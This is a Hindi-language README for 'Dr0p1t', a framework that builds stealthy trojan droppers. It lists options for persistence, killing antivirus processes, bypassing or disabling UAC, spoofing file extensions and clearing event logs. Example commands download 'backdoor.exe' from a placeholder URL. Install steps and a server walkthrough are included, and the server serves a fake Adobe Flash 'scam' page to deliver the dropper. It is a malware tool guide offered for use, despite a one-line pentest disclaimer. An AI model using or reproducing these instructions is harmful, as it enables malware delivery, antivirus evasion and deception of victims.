
एक फ्रेमवर्क जो एक उन्नत चोरी-छिपे ड्रॉपर बनाता है जो अधिकांश AVs को बायपास करता है और इसमें बहुत सारी तरकीबें हैं।
क्या आपने कभी ट्रोजन ड्रॉपर के बारे में सुना है? संक्षेप में ड्रॉपर एक प्रकार का मैलवेयर है जो अन्य मैलवेयर डाउनलोड करता है और Dr0p1t आपको एक छिपा हुआ ड्रॉपर बनाने का मौका देता है जो अधिकांश AVs को बायपास करता है और इसमें बहुत सारी तरकीबें हैं (मुझ पर विश्वास करें :D ) ;)
+ उत्पन्न निष्पादन योग्य (executable) गुण:
+ फ्रेमवर्क गुण:
+ मॉड्यूल:
+स्थायित्व मॉड्यूल:

अभी भी पूरी तरह से परीक्षण नहीं किया गया है! कुछ योगदानकर्ताओं और परीक्षकों की आवश्यकता है 😄
Usage: Dr0p1t.py Malware_Url [Options]
options:
-h, --help show this help message and exit
-s Add your malware to startup (Persistence)
-t Add your malware to task scheduler (Persistence)
-a Add your link to powershell user profile (Persistence)
-k Kill antivirus process before running your malware.
-b Run this batch script before running your malware. Check scripts folder
-p Run this powershell script before running your malware. Check scripts folder
-v Run this vbs script before running your malware. Check scripts folder
--runas Bypass UAC and run your malware as admin
--spoof Spoof the final file to an extension you choose.
--zip Tell Dr0p1t that the malware in the link is compressed as zip
--upx Use UPX to compress the final file.
--nouac Try to disable UAC on victim device
-i Use icon to the final file. Check icons folder.
--noclearevent Tell the framework to not clear the event logs on target machine after finish.
--nocompile Tell the framework to not compile the final file.
--only32 Download your malware for 32 bit devices only
--only64 Download your malware for 64 bit devices only
-q Stay quite ( no banner )
-u Check for updates
-nd Display less output information
./Dr0p1t.py Malware_Url [Options]
./Dr0p1t.py https://test.com/backdoor.exe -s -t -a -k --runas --upx
./Dr0p1t.py https://test.com/backdoor.exe -k -b block_online_scan.bat --only32
./Dr0p1t.py https://test.com/backdoor.exe -s -t -k -p Enable_PSRemoting.ps1 --runas
./Dr0p1t.py https://test.com/backdoor.zip -t -k --nouac -i flash.ico --spoof pdf --zip
Python 2 के लिए अनुशंसित संस्करण 2.7.x है, Python 3 के लिए अनुशंसित संस्करण 3.5.x है और 3.6 का उपयोग न करें क्योंकि यह अभी तक PyInstaller द्वारा समर्थित नहीं है
नोट: आपके पास रूट एक्सेस होना चाहिए
यहाँ Dr0p1t को स्थापित करने और उपयोग करने के सभी आधिकारिक वीडियो की एक सूची है प्लेलिस्ट
git clone https://github.com/D4Vinci/Dr0p1t-Framework.git
chmod 777 -R Dr0p1t-Framework
cd Dr0p1t-Framework
sudo chmod +x install.sh
./install.sh
python Dr0p1t.py
cd Dr0p1t-Framework-master
python -m pip install -r windows_requirements.txt
python Dr0p1t.py
नोट: python 2.7 में आपके पास pip नहीं है, इसलिए पहले इसे get-pip.py स्क्रिप्ट से स्थापित करें [Google पर खोजें]
नोट: सर्वर अभी भी बीटा संस्करण में है और इसमें जोड़ने के लिए बहुत सारी सुविधाएँ और बेहतर डिज़ाइन है [योगदान देने के लिए एक डिज़ाइनर की आवश्यकता है :D ]
लिनक्स और विंडोज पर यह समान है। Dr0p1t को ऊपर बताए गए चरणों का पालन करके स्थापित करने के बाद, pip का उपयोग करके server_requirements.txt में मॉड्यूल स्थापित करें, जैसे:
python -m pip install -r server_requirements.txt
अब हमारे सर्वर स्क्रिप्ट को चलाएँ:
python Dr0p1t_Server.py
सर्वर स्क्रिप्ट चलाने के बाद, यह फ्लास्क का उपयोग करके पोर्ट 5000 पर आने वाले सभी कनेक्शनों को सुनना शुरू कर देगा।
अब अपने डिवाइस से सर्वर का उपयोग करने के लिए ब्राउज़र में या तो 127.0.0.1:5000 या [आपका IP]:5000 खोलें।
इसे LAN में अन्य डिवाइसों से खोलने के लिए [आपका स्थानीय IP]:5000 खोलें और WAN में अन्य डिवाइसों के लिए [आपका वैश्विक IP]:5000 खोलें, लेकिन पहले सुनिश्चित करें कि आपने अपने राउटर को पोर्ट 5000 कनेक्शन को आपके पास अग्रेषित करने के लिए कॉन्फ़िगर किया है।
सर्वर पेज खोलने के बाद आपको एक सरल वेबसाइट दिखाई देगी जिसमें आवश्यक डेटा माँगने वाला एक सरल डिज़ाइन होगा सर्वर स्क्रीनशॉट देखें
फिर डेटा सबमिट करें, इसे कुछ प्रक्रियाओं के माध्यम से सत्यापित किया जाएगा, फिर exe फ़ाइल उत्पन्न होगी और आपको स्कैम लिंक बताने वाले पेज पर रीडायरेक्ट किया जाएगा।
लिंक दर्ज करने के बाद आपको ड्रॉपर डाउनलोड करने के लिए एक स्कैम दिखाई देगा, जो डिफ़ॉल्ट रूप से Adobe Flash डाउनलोड पेज है। स्कैम को अपने से बदलने के लिए "Scam.html" फ़ाइल की सामग्री को अपने से बदलें, लेकिन वेरिएबल्स को याद रखें (उन्हें न हटाएं)।

विंडोज के लिए और देखें लिनक्स के लिए और देखें

यदि यह उपकरण आपके लिए उपयोगी रहा है, तो मुझे एक कॉफी खरीदकर धन्यवाद देने में संकोच न करें :)
Dr0p1t Framework दुरुपयोग और अवैध उद्देश्यों के लिए जिम्मेदार नहीं है। इसका उपयोग केवल पेंटेस्ट या शैक्षिक उद्देश्य के लिए करें !!!
इस फ्रेमवर्क से कोड कॉपी करना या किसी अन्य टूल में इसका उपयोग करना स्वीकार्य है, बशर्ते आप यह बताएं कि आपने इसे कहाँ से प्राप्त किया है 😄
पुल रिक्वेस्ट का हमेशा स्वागत है :D